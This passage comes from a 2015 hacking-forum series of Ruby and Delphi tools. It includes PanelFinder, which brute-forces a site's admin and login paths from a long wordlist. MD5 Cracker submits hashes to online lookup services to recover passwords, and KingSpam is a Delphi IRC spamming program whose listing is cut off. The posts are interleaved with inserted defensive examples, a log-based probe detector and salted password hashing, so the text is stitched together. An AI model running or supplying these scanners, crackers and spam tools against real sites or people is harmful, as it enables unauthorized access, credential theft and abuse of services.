  foreground "cyan"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
  text "Search"
  background "black"
  foreground "cyan"
  width 17
  activebackground "cyan"
  highlightbackground  "cyan"
  command proc{
    # Read the entry into its own local: reassigning `target` would replace
    # the TkEntry widget with a String and break the next click
    host = target.value.to_s
    console.insert("end","[+] Searching ...\n\n")
    console.insert("end",httpfinger(host))
    console.insert("end","\n[+] Finished")
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


An image:

That's all.
#56
Scripting / [Ruby] LocateIP 0.3
27 June 2015, 01:18 AM
A simple Ruby script to locate an IP and its DNS.

Console version:

Code (ruby)

#!/usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "resolv"

# Functions

# Resolves a hostname to an IP address
def get_ip(hostname)
  begin
    return Resolv.getaddress(hostname)
  rescue
    return "Error"
  end
end

# GET request; URI.open is used because Kernel#open stopped handling URLs in Ruby 3.0
def toma(web)
  begin
    return URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)).code
  rescue
    return "404"
  end
end

# POST request with the form data in arg
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

def uso
  print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

def head
  print "\n\n-- == LocateIP 0.3 == --\n\n"
end

def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

def locateip(target)

  print "\n[+] Getting IP ...\n"

  ip = get_ip(target)

  print "\n[+] IP : "+ip+"\n"

  web = "http://www.melissadata.com/lookups/iplocation.asp"
  print "\n[+] Locating ...\n\n"

  code = tomar(web,"ipaddress="+ip+"&btn=Submit")

  if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
    print "[+] City : "+$2+"\n"
  else
    print "[+] City : Not Found\n"
  end

  if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
    print "[+] Country : "+$2+"\n"
  else
    print "[+] Country : Not Found\n"
  end

  if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
    print "[+] State or Region : "+$2+"\n"
  else
    print "[+] State or Region : Not Found\n"
  end

  print "\n[+] Getting DNS ...\n\n"

  control = "0"

  code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

  dnss = code.scan(/whois\/(.*?)\">Whois/)

  dnss.flatten.each do |dns|
    if dns != ""
      control = "1"
      print "[+] DNS Found : "+dns+"\n"
    end
  end

  if control=="0"
    print "\n[-] DNS Not Found\n"
  end
end

target = ARGV[0]

head()

if !target
  uso()
else
  locateip(target)
end

copyright()

#The End ?


Tk version:

Code (ruby)

#!/usr/bin/ruby
#LocateIP 0.3
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"
require "resolv"

# Functions

# Resolves a hostname to an IP address
def get_ip(hostname)
  begin
    return Resolv.getaddress(hostname)
  rescue
    return "Error"
  end
end

# GET request; URI.open is used because Kernel#open stopped handling URLs in Ruby 3.0
def toma(web)
  begin
    return URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)).code
  rescue
    return "404"
  end
end

# POST request with the form data in arg
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

#

window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "yellow"
  text "    Target : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

target = TkEntry.new(window){
  background "black"
  foreground "yellow"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "yellow"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

console = TkText.new(window) do
  background "black"
  foreground "yellow"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
  text "Search"
  background "black"
  foreground "yellow"
  width 17
  activebackground "yellow"
  highlightbackground  "yellow"
  command proc{

    # Read the entry into its own local: reassigning `target` would replace
    # the TkEntry widget with a String and break the next click
    host = target.value.to_s

    console.insert("end",  "[+] Getting IP ...\n")

    ip = get_ip(host)

    web = "http://www.melissadata.com/lookups/iplocation.asp"

    console.insert("end", "\n[+] Locating ...\n\n")

    code = tomar(web,"ipaddress="+ip+"&btn=Submit")

    if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
      console.insert("end", "[+] City : "+$2+"\n")
    else
      console.insert("end", "[+] City : Not Found\n")
    end

    if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
      console.insert("end","[+] Country : "+$2+"\n")
    else
      console.insert("end", "[+] Country : Not Found\n")
    end

    if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
      console.insert("end", "[+] State or Region : "+$2+"\n")
    else
      console.insert("end","[+] State or Region : Not Found\n")
    end

    console.insert("end","\n[+] Getting DNS ...\n\n")

    control = "0"

    code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

    dnss = code.scan(/whois\/(.*?)\">Whois/)

    dnss.flatten.each do |dns|
      if dns != ""
        control = "1"
        console.insert("end", "[+] DNS Found : "+dns+"\n")
      end
    end

    if control=="0"
      console.insert("end","\n[-] DNS Not Found\n")
    end

    console.insert("end","\n\n[+] Finished")

  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


An image:

That's all.
#57
Scripting / [Ruby] PanelFinder 0.5
12 June 2015, 23:52 PM
A simple Ruby script to find the administration panel of a page.

Console version:

Code (ruby)

#!/usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"

# Functions

# GET request; URI.open is used because Kernel#open stopped handling URLs in Ruby 3.0
def toma(web)
  begin
    return URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# Returns the HTTP status code as a string, or "404" on any error
def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)).code
  rescue
    return "404"
  end
end

# POST request with the form data in arg
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

def find_panel(page)
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.p
hp','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','adm
in4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  print "\n[+] Scanning ...\n\n"
  control = "0"
  panels.each do |panel|
    url = page+"/"+panel
    status_code = response_code(url)
    if status_code=="200"
      print "[+] Link : "+url+"\n"
      control = "1"
    end
  end
  if control=="1"
    print "\n[+] Finished\n"
  else
    print "\n[-] Not Found\n"
  end
end

def uso
  print "\n[+] Sintax : ruby panel_finder.rb <page>\n"
end

def head
  print "\n\n-- ==  Panel Finder 0.5 == --\n\n"
end

def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

page = ARGV[0]

head()

if !page
  uso()
else
  find_panel(page)
end

copyright()

#The End ?


Tk version:

Code (ruby)

#!/usr/bin/ruby
#PanelFinder 0.5
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"

# Functions

# GET request; URI.open is used because Kernel#open stopped handling URLs in Ruby 3.0
def toma(web)
  begin
    return URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# Returns the HTTP status code as a string, or "404" on any error
def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)).code
  rescue
    return "404"
  end
end

# POST request with the form data in arg
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

#

window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "orange"
  text "     Page : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

page = TkEntry.new(window){
  background "black"
  foreground "orange"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "orange"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

console = TkText.new(window) do
  background "black"
  foreground "orange"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "orange"
width 17
activebackground "orange"
highlightbackground  "orange"
command proc{

page = page.value.to_s
panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.p
hp','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','adm
in4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
console.insert("end", "[+] Scanning ...\n\n")
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
console.insert("end","[+] Link : "+url+"\n")
control = "1"
end
end
end
if control=="1"
console.insert("end","\n[+] Finished")
else
console.insert("end","\n[-] Not Found")
end

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


An image:



That's all.
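Seen from the defender's side, the loop above shows up in a web server's access log as one client requesting many distinct panel-style paths within seconds, most of them answered with 404. The Ruby sketch below is an added example, not part of the original post; the log lines are constructed, and the path pattern, window and thresholds are assumptions to tune per site.

```ruby
require "time"

# Constructed access-log lines (combined log format, documentation-range addresses).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Sep/2015:23:01:10 +0000] "GET /admin/admin.asp HTTP/1.1" 404 162 "-" "Ruby"
  203.0.113.7 - - [04/Sep/2015:23:01:11 +0000] "GET /admin/login.asp HTTP/1.1" 404 162 "-" "Ruby"
  203.0.113.7 - - [04/Sep/2015:23:01:12 +0000] "GET /admin/index.php HTTP/1.1" 404 162 "-" "Ruby"
  203.0.113.7 - - [04/Sep/2015:23:01:13 +0000] "GET /admin/login.php HTTP/1.1" 200 2311 "-" "Ruby"
  203.0.113.7 - - [04/Sep/2015:23:01:14 +0000] "GET /administrator/index.php HTTP/1.1" 404 162 "-" "Ruby"
  203.0.113.7 - - [04/Sep/2015:23:01:15 +0000] "GET /cpanel/ HTTP/1.1" 404 162 "-" "Ruby"
  198.51.100.20 - - [04/Sep/2015:23:01:12 +0000] "GET /login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
  198.51.100.20 - - [04/Sep/2015:23:01:20 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  198.51.100.20 - - [04/Sep/2015:23:01:21 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG

LINE_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3}) /

# Assumption: path fragments that mark a request as "looking for a login or admin panel".
PANEL_HINT = /admin|login|cpanel|webmaster|controlpanel|moderator/i

def parse_line(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[1], time: Time.strptime(m[2], "%d/%b/%Y:%H:%M:%S %z"),
    path: m[3], status: m[4].to_i }
end

# Flags clients whose densest burst of panel-style requests (inside `window`
# seconds) covers at least `min_paths` distinct paths and is mostly 404s.
# `found` lists the paths that answered 200, i.e. what the probe learned.
def detect_panel_probing(log, window: 60, min_paths: 5, min_miss_ratio: 0.5)
  by_ip = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    e = parse_line(line.chomp)
    by_ip[e[:ip]] << e if e && e[:path] =~ PANEL_HINT
  end

  findings = by_ip.map do |ip, events|
    events.sort_by! { |e| e[:time] }
    start = 0
    burst = nil
    events.each_with_index do |e, i|
      # Slide the left edge until the burst fits inside the window.
      start += 1 while e[:time] - events[start][:time] > window
      slice = events[start..i]
      burst = slice if burst.nil? || slice.size > burst.size
    end
    paths  = burst.map { |e| e[:path] }.uniq
    misses = burst.count { |e| e[:status] == 404 }
    next if paths.size < min_paths || misses.to_f / burst.size < min_miss_ratio
    { ip: ip, distinct_paths: paths.size,
      found: burst.select { |e| e[:status] == 200 }.map { |e| e[:path] }.uniq }
  end
  findings.compact
end

if __FILE__ == $PROGRAM_NAME
  detect_panel_probing(SAMPLE_LOG).each do |f|
    puts "#{f[:ip]} probed #{f[:distinct_paths]} panel paths, reachable: #{f[:found].join(', ')}"
  end
end
```

The `found` list is the part to act on: those are the administrative endpoints reachable without any prior restriction.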
#58
Scripting / [Ruby] MD5 Cracker 0.2
29 May 2015, 16:37 PM
A simple Ruby script to crack an MD5 hash.

Console version:

Code (ruby):

#!/usr/bin/ruby
#MD5 Cracker 0.2
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)).code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def crack(md5)

print "\n[+] Cracking ...\n\n"

code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")

if code=~/pass : <b>(.*?)<\/b>/
password = $1
print "[+] md5online.net -> "+password+"\n"
else
print "[-] md5online.net -> Not Found" + "\n"
end

code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)

if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
print "[+] md5.my-addr.co -> "+password+"\n"
else
print "[-] md5.my-addr.co -> Not Found" +"\n"
end

code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")

if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
print "[+] md5decryption.com -> "+password+"\n"
else
print "[-] md5decryption.com -> Not Found"+"\n"
end

print "\n[+] Finished"

end

def uso
print "\n[+] Sintax : ruby md5cracker.rb <md5>\n"
end

def head
print "\n\n-- == MD5 Cracker 0.2 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

#

md5 = ARGV[0]

head()

if !md5
uso()
else
crack(md5)
end

copyright()

#The End ?


Tk version:

Code (ruby):

#!/usr/bin/ruby
#MD5 Cracker 0.2
#(C) Doddy Hackman 2015

require "tk"
require "open-uri"
require "net/http"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def response_code(web)
begin
return Net::HTTP.get_response(URI(web)).code
rescue
return "404"
end
end

def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

#

window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "     MD5 : "
place('relx'=>"0.1",'rely'=>"0.1")
end

md5 = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Crack It"
        background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{
# Read the entry into its own variable; reassigning md5 would replace the
# TkEntry with a String and break the second click.
hash = md5.value.to_s

console.insert("end","[+] Cracking ...\n\n")

code = tomar("http://md5online.net/index.php","pass="+hash+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/b>/
password = $1
console.insert("end","[+] md5online.net -> "+password+"\n"  )
else
console.insert("end","[-] md5online.net -> Not Found" + "\n" )
end

code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+hash)

if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
password = $1
console.insert("end","[+] md5.my-addr.co -> "+password+"\n")
else
console.insert("end","[-] md5.my-addr.co -> Not Found" +"\n")
end

code = tomar("http://md5decryption.com/index.php","hash="+hash+"&submit=Decrypt It!")

if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
password = $1
console.insert("end","[+] md5decryption.com -> "+password+"\n")
else
console.insert("end","[-] md5decryption.com -> Not Found"+"\n")
end

console.insert("end","\n[+] Finished\n" )

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


An image:



That's all.
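Lookup services like the ones queried above only succeed because an unsalted MD5 digest is the same for every user who picks the same password, so it can be precomputed once. The Ruby block below is an added example, not part of the original post: it builds a small digest-to-plaintext table from a constructed wordlist, then stores the same password with per-user salted PBKDF2-HMAC-SHA256, where the table no longer matches. Function names, the record format and the iteration count are assumptions of this example.

```ruby
require "digest"
require "openssl"
require "securerandom"

# Constructed wordlist standing in for a lookup service's database.
WORDLIST = %w[123456 password letmein qwerty dragon].freeze

# Assumed work factor for PBKDF2-HMAC-SHA256; raise it as hardware allows.
PBKDF2_ITERATIONS = 600_000

# What a lookup site holds: digest => plaintext, computed once for everyone.
def build_md5_table(words)
  words.each_with_object({}) { |w, table| table[Digest::MD5.hexdigest(w)] = w }
end

def lookup(table, hex_digest)
  table[hex_digest.downcase]
end

def derive(password, salt, iterations)
  OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32,
                             OpenSSL::Digest.new("SHA256"))
end

# Returns "pbkdf2-sha256$<iterations>$<salt hex>$<key hex>" with a fresh salt.
def hash_password(password, iterations: PBKDF2_ITERATIONS)
  salt = SecureRandom.random_bytes(16)
  key  = derive(password, salt, iterations)
  ["pbkdf2-sha256", iterations, salt.unpack1("H*"), key.unpack1("H*")].join("$")
end

# Compare without returning early on the first differing byte.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verify_password(password, record)
  scheme, iterations, salt_hex, key_hex = record.split("$")
  return false unless scheme == "pbkdf2-sha256" && key_hex
  candidate = derive(password, [salt_hex].pack("H*"), iterations.to_i)
  secure_equal?(candidate, [key_hex].pack("H*"))
end

if __FILE__ == $PROGRAM_NAME
  table  = build_md5_table(WORDLIST)
  legacy = Digest::MD5.hexdigest("password")
  puts "unsalted MD5 #{legacy} -> #{lookup(table, legacy).inspect}"

  first  = hash_password("password")
  second = hash_password("password")
  puts "same password, different records: #{first != second}"
  puts "table lookup on salted key: #{lookup(table, first.split('$').last).inspect}"
  puts "verify with correct password: #{verify_password('password', first)}"
end
```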
#59
Programación General / [Delphi] KingSpam 0.4
22 May 2015, 17:23 PM
A simple program for spamming IRC channels; it can also list channels and users.

It is somewhat unstable; I recommend the Perl version.

An image:



Code (delphi):

// KingSpam 0.4
// (C) Doddy Hackman 2015

unit spam;

interface

uses
  Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  System.Classes, Vcl.Graphics,
  Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.StdCtrls,
  Vcl.Imaging.pngimage, Vcl.ExtCtrls, IdContext, IdBaseComponent, IdComponent,
  IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx, Vcl.Menus,
  ShellApi;

type
  TForm1 = class(TForm)
    PageControl1: TPageControl;
    TabSheet1: TTabSheet;
    GroupBox1: TGroupBox;
    Label1: TLabel;
    host: TEdit;
    Label2: TLabel;
    port: TEdit;
    Label3: TLabel;
    nombre: TEdit;
    Label4: TLabel;
    canal: TEdit;
    Label5: TLabel;
    spam: TEdit;
    Button1: TButton;
    Button2: TButton;
    Button3: TButton;
    TabSheet2: TTabSheet;
    GroupBox2: TGroupBox;
    GroupBox3: TGroupBox;
    canales: TListBox;
    users: TListBox;
    TabSheet3: TTabSheet;
    GroupBox4: TGroupBox;
    GroupBox5: TGroupBox;
    lista_canales: TListBox;
    console1: TMemo;
    Label6: TLabel;
    canal_agregar: TEdit;
    Button4: TButton;
    Button5: TButton;
    TabSheet5: TTabSheet;
    GroupBox8: TGroupBox;
    console2: TMemo;
    IdIRC1: TIdIRC;
    Button9: TButton;
    StatusBar1: TStatusBar;
    GroupBox6: TGroupBox;
    canal_spam_usuarios: TEdit;
    TabSheet4: TTabSheet;
    GroupBox7: TGroupBox;
    Image2: TImage;
    Label7: TLabel;
    PopupMenu1: TPopupMenu;
    L1: TMenuItem;
    R1: TMenuItem;
    OpenDialog1: TOpenDialog;
    file_spam: TListBox;
    spam_usuarios: TTimer;
    Button11: TButton;
    Button6: TButton;
    otrospamfile: TListBox;
    Image3: TImage;
    procedure Button2Click(Sender: TObject);
    procedure IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
      const AMessage: string);

    procedure Button3Click(Sender: TObject);
    procedure Button4Click(Sender: TObject);
    procedure Button5Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);
    procedure L1Click(Sender: TObject);
    procedure R1Click(Sender: TObject);
    procedure spam_usuariosTimer(Sender: TObject);
